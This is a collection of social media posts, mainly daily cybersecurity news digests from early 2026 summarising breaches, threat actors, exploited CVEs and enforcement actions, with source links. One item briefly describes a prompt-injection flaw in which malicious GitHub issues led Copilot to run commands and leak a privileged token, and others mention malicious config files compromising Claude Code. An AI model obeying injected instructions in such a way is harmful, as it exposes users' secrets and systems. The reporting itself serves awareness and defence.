"The Invisible Front" — my book on cyberwarfare as a geopolitical pillar is now on Amazon.

The core argument: a well-crafted malware can be more strategically dangerous than a missile. Not hyperbole — the doctrine, the attribution problems, and the asymmetry of cost all point the same direction.

The book covers:
→ Cyberwarfare as modern geopolitical instrument — not a side channel, a primary front
→ Why attribution is the hardest problem and why states exploit that gap deliberately
→ The asymmetry: a nation-state attack costs thousands, defending against it costs billions
→ How the invisible front interacts with kinetic warfare, sanctions, and information ops

Written for security professionals, policymakers, and anyone trying to understand why the next major conflict will be decided before a single tank moves.

→ https://www.amazon.com/dp/B0GHSFJTVY

#infosec #cyberwarfare #geopolitics #threatintel #nationstate #research #cybersecurity

Iran’s MOIS-linked cybercrime operations highlight how state actors blur lines between espionage, crime, and disruption. In cyberspace, attribution and intent rarely come clean. 🕵️‍♂️⚠️ #NationState #CyberEspionage

https://www.theregister.com/2026/03/10/cybercrime_iran_mois/

Alright team, it's been a pretty packed week in cyber, with some notable breaches, a deep dive into nation-state TTPs, critical vulnerabilities under active exploitation, and some interesting discussions around AI's role in both attack and defence. Let's get into it:

Recent Cyber Attacks or Breaches 🚨

- The FBI is probing a breach of its unclassified systems, which reportedly contained "law enforcement sensitive information" related to wiretapping and foreign intelligence surveillance warrants, including PII of investigation subjects. This follows previous compromises of US law enforcement wiretapping systems by Chinese state-backed actors.
- Chinese EV charger manufacturer ELECQ suffered a ransomware attack on its AWS cloud platform, leading to the encryption and copying of customer databases containing names, email addresses, phone numbers, and home addresses. No financial data was compromised, and charging devices were unaffected.
- Ericsson Inc. disclosed a data breach affecting employees and customers, including SSNs and financial info for thousands, due to a hack on one of its service providers. This highlights persistent supply chain risks, even if no data misuse has been confirmed yet.
- The ShinyHunters threat actor claims to be actively exploiting misconfigured Salesforce Experience Cloud platforms, targeting the `/s/sfsites/aura` API endpoint to steal data. Salesforce attributes this to customer misconfigurations, not a platform vulnerability, and has issued guidance to restrict guest user permissions.
- Two popular Chrome extensions, "QuickLens" and "ShotBird," turned malicious after ownership transfer, enabling code injection and data theft by stripping security headers, injecting JavaScript from C2, and delivering fake browser updates leading to credential harvesting. This highlights a critical extension supply chain risk.
- The FBI is warning of phishing attacks impersonating US city and county planning/zoning officials, targeting businesses and individuals applying for land-use permits. Attackers use publicly available info to craft convincing emails, demanding fraudulent fees via wire transfer, P2P, or cryptocurrency.
- Dutch intelligence agencies have warned of a "large-scale" Russian cyber campaign targeting Signal and WhatsApp accounts of government officials, journalists, and military personnel globally. Attackers use social engineering to trick victims into sharing security codes or abuse the "linked devices" feature, bypassing end-to-end encryption.
- LastPass has alerted users to a new phishing campaign using display name spoofing and fake internal email threads to impersonate LastPass and direct victims to imitation SSO pages to harvest credentials. Users are reminded LastPass will never ask for their master password.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/08/fbi_investigates_wiretap_system_breach/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/09/ransomware_crooks_hit_ev_charger/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/
📰 The Hacker News | https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/

New Threat Research on Threat Actors/Groups, Ransomware, Malware, or Techniques and Tradecraft 🛡️

- CL-UNK-1068, a Chinese-speaking threat actor, has been conducting cyber-espionage against critical infrastructure sectors across South, Southeast, and East Asia since 2020. They use custom malware, open-source tools, and living-off-the-land binaries, gaining initial access via web server exploitation and web shells, then moving laterally for credential theft and data exfiltration.
- The Pakistan-aligned threat actor Transparent Tribe is leveraging AI-powered coding tools to generate "vibe-coded" malware in niche programming languages (Nim, Zig, Crystal) to target Indian government entities and embassies. This approach allows them to flood target environments with disposable, polyglot binaries, enhancing evasion.
- The Iranian hacking group MuddyWater (aka Seedworm) has targeted US companies, including banks, airports, and non-profits, as well as an Israeli software firm, in a campaign that intensified after US-Israel military strikes on Iran. This activity aligns with a broader trend of hacktivist-fueled cyberattacks and wiper campaigns.
- A Russian national, Evgenii Ptitsyn, has pleaded guilty in a US federal court for his role in the Phobos ransomware operation, which extorted over $39 million from more than 1,000 public and private entities globally. This conviction highlights ongoing international law enforcement efforts to disrupt ransomware ecosystems.

💡 Dark Reading | https://www.darkreading.com/threat-intelligence/chinese-cyber-threat-critical-asian-sectors
📰 The Hacker News | https://thehackernews.com/2026/03/transparent-tribe-uses-ai-to-mass.html
📰 The Hacker News | https://thehackernews.com/2026/03/iran-linked-muddywater-hackers-target.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/08/fbi_investigates_wiretap_system_breach/

Vulnerabilities, Exploits, and Zero-Days ⚠️

- A high-severity buffer over-read vulnerability (CVE-2026-21385, CVSS 7.8) in Qualcomm's Graphics component, affecting Android devices, is under "limited, targeted exploitation" in the wild. This flaw can lead to memory corruption and arbitrary code execution.
- Google has detailed "Coruna" (aka CryptoWaters), a powerful exploit kit featuring five full iOS exploit chains and 23 exploits, targeting Apple iPhones running iOS versions 13.0 to 17.2.1. The kit's evolution is noteworthy, starting as a commercial surveillance tool and later repurposed by Russian espionage and Chinese financial actors.
- Microsoft Azure CTO Mark Russinovich demonstrated how Anthropic's Claude Opus 4.6 AI successfully decompiled 40-year-old Apple II machine code and identified security vulnerabilities, including "silent incorrect behavior." Anthropic's Red Team previously warned that Claude Opus 4.6 found high-severity vulnerabilities, some decades-old, in well-tested codebases like Firefox (22 new bugs, 14 high-severity).

📰 The Hacker News | https://thehackernews.com/2026/03/google-confirms-cve-2026-21385-in.html
📰 The Hacker News | https://thehackernews.com/2026/03/coruna-ios-exploit-kit-uses-23-exploits.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/09/claude_legacy_code_vulns/
📰 The Hacker News | https://thehackernews.com/2026/03/anthropic-finds-22-firefox.html

Threat Landscape Commentary 🌍

- Ransomware attacks are increasingly frequent and impactful, with over 5,600 publicly disclosed incidents worldwide in 2024, costing an average of $2.73 million per incident and sometimes human lives. Former FBI and CISA leaders advocate for the administration's National Cyber Strategy, stressing the need for sustained, focused government-industry collaboration, prioritising critical sectors for resilience, and holding cryptocurrency exchanges accountable.
- Agentic AI is poised to deliver exponential productivity gains but simultaneously expands attack surfaces and scales attacker capabilities, creating an "AI arms race" in cybersecurity. While 88% of organisations are already using AI-driven remediation, concerns remain about trust in AI decisions and AI's own security risks.
- The ongoing US-Iran conflict marks a significant shift, with the cyber domain playing a central and openly acknowledged role, unlike previous military engagements. This highlights the increasing integration of cyber capabilities into modern warfare and its direct impact on geopolitical conflicts.

🤫 CyberScoop | https://cyberscoop.com/national-cyber-strategy-ransomware-prioritization-op-ed/
💡 Dark Reading | https://www.darkreading.com/application-security/auto-remediation-agentic-ai
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/09/kettle_2026_episode_01_iran_war/

Regulatory Issues or Changes ⚖️

- Europol, in coordinated operations, has successfully dismantled Tycoon2FA, a dominant phishing-as-a-service (PhaaS) platform responsible for 62% of Microsoft-blocked phishing attempts, and LeakBase, a vast stolen data marketplace with over 142,000 registered users. These takedowns represent significant wins against the cybercrime ecosystem.
- Dutch national police have launched a novel "Game Over?!" campaign, giving 100 alleged scammers less than two weeks to surrender or face public shaming through unblurred photos on roadside ads and TV. This aggressive tactic aims to identify suspects, deter new recruits, and combat a surge in fake police/bank employee scams.
- Microsoft Teams is rolling out a new feature in May 2026 that will automatically tag third-party bots in meeting lobbies, requiring explicit admission by organisers. This enhancement aims to prevent malicious or unrecognised non-human participants from accidentally joining meetings, giving organisers full control and improving security.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/08/fbi_investigates_wiretap_system_breach/
📰 The Hacker News | https://thehackernews.com/2026/03/europol-led-operation-takes-down-tycoon.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/09/dutch_police_fraud_shaming/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/microsoft/microsoft-teams-will-tag-third-party-bots-in-meeting-lobbies/

Government Staffing or Program Changes 🏛️

- National Cyber Director Sean Cairncross detailed upcoming initiatives for the Trump administration's cyber strategy, including an "interagency cell" to confront malign hackers through diplomatic efforts, arrests, and cyber offense. The strategy also involves pilot programs for critical infrastructure security tailored to specific industries and states, and a review of regulations like the SEC's incident disclosure rule.
- Cairncross emphasised better information sharing with industry, a call for private sector resource dedication, and plans for a cybersecurity academy, foundry, and accelerator to address workforce gaps and innovation.

🤫 CyberScoop | https://cyberscoop.com/national-cyber-director-trump-cyber-strategy-interagency-cell-critical-infrastructure-pilots/

Crypto Flows to Sanctioned Entities 💰

- Chainalysis research reveals that sanctioned entities conducted $154 billion worth of cryptocurrency transactions in 2025, a 694% year-over-year increase, with $104 billion going to sanctioned entities and the rest to illicit addresses. The ruble-backed A7A5 stablecoin alone processed $93.3 billion, serving as a crucial bridge for Russian businesses to access global markets despite sanctions.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/08/fbi_investigates_wiretap_system_breach/

#CyberSecurity #ThreatIntelligence #Ransomware #NationState #APT #ZeroDay #Vulnerability #Phishing #AI #DataBreach #IncidentResponse #LawEnforcement #CriticalInfrastructure #SupplyChainSecurity

We Are Witnessing The Return of Empires & The END of Nations

Nearly all of us on Earth live within a 'nation-state'. Nation-states are an invisible and seemingly inevitable and eternal part of the infrastructure that forms our society: the water we swim in. Rarely do we pause to consider how this global system of nation-states came into being, and what might replace it after it's gone

https://youtu.be/Mo88imJNWkU?si=c2kiW6eqKGpVad_E

#AaronBastani #RanaDasgupta #democracy #WorkersRights #NationState #WorldOrder

Good morning, cyber pros! ☕ It's been a busy 24 hours with some critical zero-day warnings, new insights into nation-state influence operations, and a few notable breaches. Let's dive into the details:

Recent Breaches: Medical, Retail, and Sports Hit 🚨

- Medical device manufacturer UFP Technologies confirmed a cyber incident on 14 February, leading to data theft and potential destruction, though primary IT systems remain operational.
- French football club Olympique de Marseille reported an "attempted cyberattack" after a threat actor leaked samples claiming 400,000 individuals' data and 2,050 Drupal CMS accounts were stolen.
- European DIY retailer ManoMano disclosed a data breach affecting 38 million customers, stemming from a compromised third-party customer service provider, exposing names, emails, phone numbers, and communications.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/medical-device-maker-ufp-technologies-warns-of-data-stolen-in-cyberattack/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/olympique-marseille-football-club-confirms-cyberattack-after-data-leak/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/european-dyi-chain-manomano-data-breach-impacts-38-million-customers/

Critical Zero-Days and RCE Flaws Under the Spotlight ⚠️

- Five Eyes agencies and CISA issued urgent warnings about two Cisco Catalyst SD-WAN zero-days (CVE-2026-20127, CVSS 10.0; CVE-2022-20775, CVSS 7.8) actively exploited since 2023 by a "highly sophisticated threat actor" UAT-8616 to gain root access on critical infrastructure.
- Check Point discovered multiple RCE and API key theft vulnerabilities in Anthropic's Claude Code, stemming from malicious configuration files in repositories, highlighting new supply chain risks in AI-driven development.
- A critical RCE flaw (CVE-2026-21902, CVSS 10.0) in Juniper Networks PTX Series routers allows unauthenticated root code execution due to an exposed internal service; immediate patching or access restriction is advised.
- Trend Micro patched two critical RCE path traversal flaws (CVE-2025-71210, CVE-2025-71211) in Apex One management console, allowing unprivileged code execution if the console is externally exposed.
- Previously harmless Google API keys, when exposed client-side, can now authenticate to Gemini AI, potentially allowing attackers to access private data and incur significant usage charges.

🤫 CyberScoop | https://cyberscoop.com/cisco-zero-days-cisa-emergency-directive-five-eyes/
📰 The Hacker News | https://thehackernews.com/2026/02/cisco-sd-wan-zero-day-cve-2026-20127.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/26/five_eyes_cisco_sdwan/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/26/clade_code_cves/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/trend-micro-warns-of-critical-apex-one-rce-vulnerabilities/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/previously-harmless-google-api-keys-now-expose-gemini-ai-data/

Evolving Threat Actor TTPs: AI, Supply Chain, and Social Engineering 🛡️

- A coordinated campaign is targeting software developers with fake Next.js job interview repositories, using multiple execution triggers (VS Code, npm run dev, backend startup) to deliver in-memory JavaScript backdoors for RCE and data exfiltration.
- OpenAI reported nation-state actors, including a CCP-linked individual and a Russian group ("Operation No Bell"), are using ChatGPT for politically motivated influence operations, from drafting smear campaigns to generating geopolitical articles.
- A malicious NuGet package, StripeApi.Net, was discovered typosquatting the legitimate Stripe.net library, designed to steal Stripe API tokens from unsuspecting developers while maintaining application functionality.
- The cybercrime group Scattered Lapsus$ Hunters (SLSH) is actively recruiting women for vishing calls to IT helpdesks, aiming to enhance social engineering effectiveness by leveraging different voice profiles.
- Google disrupted a China-linked cyberespionage campaign (UNC2814) active since 2017, targeting telcos and governments in 42 countries, using a new Gridtide backdoor and abusing Google Sheets for C2 communications.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/fake-nextjs-job-interview-tests-backdoor-developers-devices/
📰 The Hacker News | https://thehackernews.com/2026/02/fake-nextjs-repos-target-developers.html
👁️ Dark Reading | https://www.darkreading.com/cyberattacks-data-breaches/chinese-police-chatgpt-smear-japan-pm-takaichi
📰 The Hacker News | https://thehackernews.com/2026/02/malicious-stripeapi-nuget-package.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/26/scattered_lapsus_hunters_female_recruits/
🗞️ The Record | https://therecord.media/google-disrupts-china-linked-cyberespionage-campaign-spanning-dozens-of-countries

Ransomware Trends and AI's Double-Edged Sword 📊

- Despite a 50% surge in ransomware attacks, the payment rate dropped to a record low of 28% in 2025, though the median ransom paid significantly increased to $59,556, indicating a shift in victim behaviour and attacker tactics.
- Veracode's report highlights a growing "security debt," with 82% of companies having unresolved vulnerabilities for over a year, suggesting that the rapid pace of AI-driven development is creating more flaws than can be fixed, making comprehensive security "unattainable."
- The UK government has implemented a new Vulnerability Monitoring Service, significantly reducing the median fix time for critical public sector vulnerabilities from 50 to 8 days, addressing long-standing issues with digital defences.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/ransomware-payment-rate-drops-to-record-low-despite-attack-surge/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/26/veracode_security_ai/
🗞️ The Record | https://therecord.media/united-kingdom-vulnerability-scanning-cyber

FTC Clarifies COPPA for Age Verification 🔒

- The Federal Trade Commission (FTC) issued a policy statement clarifying that it will not enforce COPPA against companies using age verification technologies, provided strict conditions are met regarding data use, retention, notice, and security.
- This aims to encourage the adoption of age verification tools without fear of COPPA violations, with the FTC planning a broader review of the COPPA Rule to address this area.

🗞️ The Record | https://therecord.media/ftc-says-it-wont-enforce-coppa-age-verification

#CyberSecurity #ThreatIntelligence #ZeroDay #RCE #Vulnerability #APT #NationState #SupplyChainAttack #SocialEngineering #AI #Ransomware #DataBreach #DataPrivacy #InfoSec #CyberAttack #IncidentResponse

It's been a busy 24 hours in the cyber world with significant updates on nation-state activity, several actively exploited vulnerabilities, major data breaches, and a stark reminder about insider threats and the evolving regulatory landscape. Let's dive in:

Recent Cyber Attacks and Breaches ⚠️

- Wynn Resorts confirmed an employee data breach after the ShinyHunters extortion gang listed them, claiming over 800k records with PII (including SSNs) were stolen. Wynn stated the attackers claimed to have deleted the data, a claim security experts view with scepticism, often implying a ransom payment.
- Medical device manufacturer UFP Technologies reported a cyberattack where some IT systems were isolated and data was stolen or destroyed, though backups facilitated restoration. The company is investigating the extent of sensitive data exfiltration and expects cyber insurance to cover most costs.
- Marquis Software Solutions is suing SonicWall, alleging gross negligence led to a ransomware attack affecting 74 US banks. The breach was traced to a security flaw in SonicWall's MySonicWall cloud backup service, exposing configuration data and MFA scratch codes, rather than an unpatched firewall vulnerability.
- Health insurance tech provider TriZetto Provider Solutions updated a 2024 data breach figure, now impacting over 3.4 million people. A hacker accessed historical eligibility reports via a web portal, exposing sensitive healthcare data including SSNs and health insurance numbers.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/wynn-resorts-confirms-employee-data-breach-after-extortion-threat/
🗞️ The Record | https://therecord.media/ufp-technologies-medical-devices-sec-filing-cyberattack
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/marquis-sues-sonicwall-over-backup-breach-that-led-to-ransomware-attack/
🗞️ The Record | https://therecord.media/trizetto-healthcare-tech-company-data-breach-update
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/wynn_resorts_shinyhunters/

New Threat Research: Actors, Malware, and Tradecraft 🛡️

- North Korea's Lazarus Group has been observed deploying Medusa ransomware in recent attacks, including against a Middle Eastern organisation and an unsuccessful attempt on a US healthcare entity. This highlights Lazarus's continued financial motivation and willingness to target critical infrastructure.
- Google's Threat Intelligence Group (GTIG) and Mandiant disrupted a global espionage campaign by suspected Chinese threat actor UNC2814, impacting 53 organisations in 42 countries. The group used a new C-based backdoor, 'GRIDTIDE,' which abuses the Google Sheets API for evasive command-and-control (C2) operations, blending malicious traffic with normal activity.
- A financially motivated group, "Diesel Vortex," is targeting freight and logistics operators in the US and Europe with sophisticated phishing campaigns using 52 domains. They stole over 1,600 unique credentials, employing Cyrillic homoglyph tricks, voice phishing, and a multi-stage cloaking process to evade detection and facilitate cargo diversion.
- A new cybercrime service, '1Campaign,' enables threat actors to run persistent malicious Google Ads by cloaking techniques. It filters out security researchers, showing benign content to them while directing real victims to phishing or crypto-drainer sites, effectively evading scrutiny.
- Telephone-Oriented Attack Delivery (TOAD) phishing emails, which contain only a phone number in a fake billing notification, are increasingly bypassing secure email gateways. This is due to their indistinguishability from legitimate business contacts, often combined with other evasion tactics like QR codes and multi-hop redirects.
- Hackers are luring Next.js developers with malicious GitHub repositories disguised as legitimate job interview projects. These repos execute secret-stealing malware in memory, often triggered by Visual Studio Code's workspace automation or running the project's development server, exfiltrating sensitive data like source code and secrets.
- OpenAI has banned a user with links to Chinese law enforcement who attempted to use ChatGPT to plan and track smear campaigns against critics of the Chinese Communist Party, including the Japanese Prime Minister. This highlights the use of AI in sophisticated influence operations and transnational repression tactics like creating fake obituaries and mass-reporting social media accounts.

🕶️ Dark Reading | https://www.darkreading.com/cyberattacks-data-breaches/lazarus-group-new-position-medusa-ransomware
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/chinese-cyberspies-breached-dozens-of-telecom-firms-govt-agencies/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/google_and_friends_disrupt_unc2814/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-freight-and-logistics-orgs-in-the-us-europe/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/1campaign-platform-helps-malicious-google-ads-evade-detection/
🕶️ Dark Reading | https://www.darkreading.com/threat-intelligence/why-call-this-number-toad-emails-beat-gateways
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/fake_interview_repos_lure_nextjs_devs_into_running_secret_stealing_malware/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/chinese_law_enforcement_chatgpt_abuse/
🤫 CyberScoop | https://cyberscoop.com/chinese-chatgpt-online-harassment-campaign-against-critics-dissidents/

Vulnerabilities: RCE, Active Exploitation, and Zero-Days 🔒

- Five Eyes agencies issued urgent warnings about a critical authentication bypass vulnerability (CVE-2026-20127) in Cisco Catalyst SD-WAN, actively exploited as a zero-day since 2023. Attackers can gain high-privileged access, add rogue peers, and potentially escalate to root by exploiting CVE-2022-20775. Immediate patching, restricted WAN exposure, and hunting for IoCs are crucial.
- Zyxel has released security updates for a critical Remote Code Execution (RCE) vulnerability (CVE-2025-13942) affecting over a dozen router models. The flaw in the UPnP function allows unauthenticated attackers to execute OS commands via crafted SOAP requests, though WAN access must also be enabled for remote exploitation.

🗞️ The Record | https://therecord.media/five-eyes-warn-hackers-exploit-cisco-sd-wan
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/critical-cisco-sd-wan-bug-exploited-in-zero-day-attacks-since-2023/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/zyxel-warns-of-critical-rce-flaw-affecting-over-a-dozen-routers/

Threat Landscape Commentary 🌍

- A VulnCheck report highlights that despite over 40,000 new vulnerabilities published in 2025, only 422 (1%) were actively exploited in the wild. This underscores the need for defenders to prioritise based on known exploited vulnerabilities, as network edge devices remain prime targets.
- While AI models like Anthropic's Claude Code Security are effective at identifying software vulnerabilities (500+ in open-source codebases), security researchers note a significant gap in their ability to propose actionable fixes. The sheer volume of AI-generated reports is overwhelming maintainers, highlighting that discovery is cheap, but remediation is hard.
- Researchers from Georgia Tech found that the global threat intelligence (TI) ecosystem is vulnerable to adversarial actions and geopolitical fragmentation. Their study revealed many security vendors conduct shallow malware analysis and rarely share binaries, leading to slow information propagation.
- A new "Operational Technology Incident (OTI) Impact Score" model, inspired by the Richter Scale, has been developed to provide a standardised way to measure the impact of OT cybersecurity incidents. It scores events based on severity, reach, and duration, aiming to offer clearer communication for executives, governments, and insurers.

🤫 CyberScoop | https://cyberscoop.com/vulncheck-exploited-vulnerabilities-report-2025/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/ai_finding_bugs/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/threat_intelligence_supply_chain_research/
🕶️ Dark Reading | https://www.darkreading.com/ics-ot-security/richter-scale-model-measures-cyber-incidents

Regulatory Issues and Changes ⚖️

- Peter Williams, former general manager of L3Harris's cybersecurity unit, was sentenced to 87 months in prison for stealing and selling eight zero-day exploits to Russian broker Operation Zero. The US Treasury also sanctioned Operation Zero (Matrix LLC), its owner Sergey Zelenyuk, and associated entities, marking the first use of the Protecting American Intellectual Property Act (PAIPA).
- Interpol, with law enforcement from 16 African countries and private companies, conducted "Operation Red Card 2.0," leading to 651 arrests and recovering over $4.3 million. The operation targeted investment fraud, mobile loan fraud, and cybercrime syndicates, highlighting growing efforts against cybercrime in Africa.
- China's top prosecutorial agency is intensifying criminal enforcement against commercial espionage and technology leaks to protect domestic innovation. Over 1,200 business secret infringement cases were handled from 2021-2024, focusing on AI, biomanufacturing, and energy sectors.

🤫 CyberScoop | https://cyberscoop.com/l3harris-executive-peter-williams-sentenced-zero-day-exploits-russian-broker/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/ex-l3harris-exec-jailed-for-selling-zero-days-to-russian-exploit-broker/
🚨 The Hacker News | https://thehackernews.com/2026/02/defense-contractor-employee-jailed-for.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/former_l3harris_exec_jailed/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/us-sanctions-russian-exploit-broker-for-buying-stolen-zero-days/
🕶️ Dark Reading | https://www.darkreading.com/cybersecurity-operations/operation-red-card-2-0-leads-to-651-arrests-in-africa
🗞️ The Record | https://therecord.media/china-domestic-ip-theft-crackdown

Government Staffing or Program Changes 🏛️

- The Cybersecurity and Infrastructure Security Agency (CISA) is reportedly "decimated" and "in trouble" a year into the second Trump administration. The agency has lost roughly a third of its personnel, shuttered divisions (like election security), and seen a decline in morale due to political backlash, leading to diminished capabilities.

🤫 CyberScoop | https://cyberscoop.com/cisa-personnel-cuts-trump-second-term-analysis/

Everything Else 🌐

- A Moscow resident, Ruslan Satuchin, is accused of attempting to extort money from the notorious Conti ransomware group by posing as an FSB officer. He allegedly contacted Conti members in September 2022, demanding payment to avoid criminal prosecution.

🗞️ The Record | https://therecord.media/moscow-man-accused-of-extorting-conti-gang

#CyberSecurity #ThreatIntelligence #Ransomware #NationState #APT #ZeroDay #Vulnerability #Phishing #AI #DataBreach #IncidentResponse #Cybercrime #InfoSec #CISA #OTSecurity

Hello cyber practitioners! It's been a busy 24 hours with a flurry of activity across data breaches, nation-state operations, critical vulnerabilities, and some interesting discussions around AI and privacy. Let's dive in:

Recent Cyber Attacks or Breaches ⚠️

- The ShinyHunters extortion gang has claimed responsibility for breaching Dutch telecom Odido, impacting 6.2 million customers, and digital auto platform CarGurus, exposing data from 12.4 million accounts. The group often uses voice phishing (vishing) to compromise single sign-on (SSO) accounts.
- The FBI reported a significant surge in ATM jackpotting attacks in 2025, with criminals cracking 700 machines and costing banks over $20 million. Attackers frequently use malware like Ploutus to manipulate the eXtensions for Financial Services (XFS) software, forcing cash dispensing.
- Spanish authorities arrested four alleged members of the "Anonymous Fénix" hacktivist group for distributed denial-of-service (DDoS) attacks against government ministries and public institutions in Spain and South America, particularly after the Valencia floods.
- Two South Korean teenagers were charged for breaching Seoul's Ttareungyi public bike service in June 2024, exposing data of 4.62 million users, including IDs, phone numbers, and home addresses.
- The UAE Cyber Security Council claimed to have thwarted an organised 'terrorist' ransomware attack targeting its digital infrastructure and vital sectors, noting the use of AI technologies to develop sophisticated offensive tools.
- Decentralised finance platform Step Finance is shutting down after a $40 million theft from its treasury in January, following the compromise of executive team devices.
- Researchers uncovered and took down the infrastructure of Diesel Vortex, a Russian-linked cybercrime group that stole over 1,600 login credentials from Western cargo companies, enabling freight shipment diversion and check fraud.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/shinyhunters-extortion-gang-claims-odido-breach-affecting-millions/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/cargurus-data-breach-exposes-information-of-124-million-accounts/
🌑 Dark Reading | https://www.darkreading.com/cyber-risk/atm-jackpotting-attacks-surged-2025
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/spain-arrests-suspected-anonymous-fenix-hacktivists-for-ddosing-govt-sites/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/korean_bike_breach_charges/
🗞️ The Record | https://therecord.media/uae-claims-it-stopped-terrorist-ransomware-attack
🗞️ The Record | https://therecord.media/step-finance-cryptocurrency-theft-shutdown
🗞️ The Record | https://therecord.media/phishing-operation-russia-armenia-targeting-us-european-cargo

New Threat Research on Threat Actors/Groups, Ransomware, Malware, or Techniques and Tradecraft 🛡️

- North Korea's Lazarus Group (specifically the Andariel/Stonefly subgroup) is now deploying Medusa ransomware in financially motivated attacks, targeting US healthcare organisations and an unnamed entity in the Middle East. This marks a shift from their self-developed strains to using ransomware-as-a-service (RaaS) offerings.
- The China-aligned UnsolicitedBooker threat cluster has shifted its focus from Saudi Arabian entities to telecommunications companies in Kyrgyzstan and Tajikistan. They are deploying LuciDoor and MarsSnake backdoors via malicious Microsoft Office documents and phishing links.
- Anthropic accused three Chinese AI labs (DeepSeek, Moonshot, MiniMax) of "industrial-scale campaigns" involving 24,000 fraudulent accounts and 16 million queries to illicitly distill Claude's capabilities. This "illicit distillation" poses national security risks if these unprotected models are used for offensive cyber operations, disinformation, or mass surveillance.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/north-korean-lazarus-group-linked-to-medusa-ransomware-attacks/
🗞️ The Record | https://therecord.media/north-korean-hackers-using-medusa-ransomware
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/north_koreas_lazarus_group_healthcare_medusa_ransomware/
📰 The Hacker News | https://thehackernews.com/2026/02/unsolicitedbooker-targets-central-asian.html
🤫 CyberScoop | https://cyberscoop.com/anthropic-accuses-chinese-labs-ai-distillation-cyber-risk/
📰 The Hacker News | https://thehackernews.com/2026/02/anthropic-says-chinese-ai-firms-used-16.html

Vulnerabilities, especially any mentioning Remote Code Exploitation (RCE), Active Exploitation, or Zero-Days 🚨

- SolarWinds has released patches for four critical Serv-U vulnerabilities (CVE-2025-40538, CVE-2025-40540, CVE-2025-40539, CVE-2025-40541), all with CVSS 9.1 ratings. These flaws, including a broken access control and type confusion bugs, could allow attackers with high privileges to gain root access and execute arbitrary code on unpatched servers. Immediate update to Serv-U 15.5.4 is strongly advised.
- A vulnerability dubbed RoguePilot in GitHub Codespaces allowed prompt injection via malicious GitHub issues. This enabled GitHub Copilot to silently execute commands and leak sensitive data, such as the privileged GITHUB_TOKEN, representing an AI-mediated supply chain attack. Microsoft has since patched the flaw.
- Researchers uncovered over 1,500 security vulnerabilities, including 54 high-severity issues, across ten popular Android mental health applications with a combined 14.7 million installs. These flaws could expose sensitive therapy data, allow credential interception, spoof notifications, and bypass root detection.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/critical-solarwinds-serv-u-flaws-offer-root-access-to-servers/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/patch_these_4_critical_makemeroot/
📰 The Hacker News | https://thehackernews.com/2026/02/roguepilot-flaw-in-github-codespaces.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/android-mental-health-apps-with-147m-installs-filled-with-security-flaws/

Threat Landscape Commentary 🌍

- The FBI has affirmed its commitment to combating transnational criminal networks operating industrial-scale scamming compounds in Southeast Asia. These operations traffic individuals and facilitate pig-butchering and cryptocurrency investment scams, generating billions in illicit funds.

🗞️ The Record | https://therecord.media/us-committed-to-fighting-southeast-asia-scam-compounds

Data Privacy 🔒

